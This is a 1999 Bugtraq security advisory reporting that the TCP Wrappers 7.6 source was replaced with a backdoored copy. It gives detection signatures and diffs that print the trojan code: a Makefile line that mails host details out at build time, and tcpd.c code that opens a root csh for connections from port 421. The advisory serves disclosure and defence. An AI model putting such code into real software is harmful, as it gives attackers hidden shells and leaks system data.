Date: Thu, 21 Jan 1999 11:38:17 -0500 From: Wietse Venema To: BUGTRAQ@netspace.org Subject: backdoored tcp wrapper source code TCP Wrappers is a widely-used security tool to protect UNIX systems against intrusion. In has an estimated installed base of millions. Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a backdoored version. Eventually this was bound to happen, and that's why the source file is accompanied by a PGP signature. But that is no guarantee against people downloading and installing backdoored software. The backdoor gives access to a privileged shell when a client connects from port 421. The backdoored copy was downloaded 52 times between 07:16 MET and 16:29 MET. I have informed the sites that downloaded a copy. Below are details on how to recognize the backdoored version. Wietse Relevant time stamp/size information (times relative to MET): Backdoored version: % ls -lcta -r--r--r-- 1 wswietse 99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz ... dr-xr-sr-x 3 wswietse 4096 Apr 11 1998 . Restored version: % ls -lt tcp_wrappers_7.6.tar.gz -r--r--r-- 1 wswietse 99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz The signature of the bad TAR file is: length 99186 instead of 99438. The signature of a compiled tcpd binary is: strings -a tcpd | grep csh any output probably means trouble. Changes that were made to the tcp wrapper 7.6 source code: diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile *** 7.6/Makefile Mon Apr 7 20:34:16 1997 --- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997 *************** *** 26,31 **** --- 26,32 ---- @echo @echo "If none of these match your environment, edit the system" @echo "dependencies sections in the Makefile and do a 'make other'." + @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com' @echo ####################################################### *************** *** 649,655 **** # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ --- 650,656 ---- # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! # KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ Only in 7.6: Makefile- diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c *** 7.6/tcpd.c Sun Feb 11 11:01:33 1996 --- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996 *************** *** 41,52 **** --- 41,63 ---- int allow_severity = SEVERITY; /* run-time adjustable */ int deny_severity = LOG_WARNING; /* ditto */ + char IDENT[]="NC421\n"; + char SRUN[]="-csh"; + char SPATH[]="/bin/csh"; + #define PORT 421 + main(argc, argv) int argc; char **argv; { struct request_info request; + struct sockaddr_in from; char path[MAXPATHNAMELEN]; + int fromlen; + + fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from, + &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT, + strlen(IDENT));execl(SPATH,SRUN,(char*)0);}} /* Attempt to prevent the creation of world-writable files. */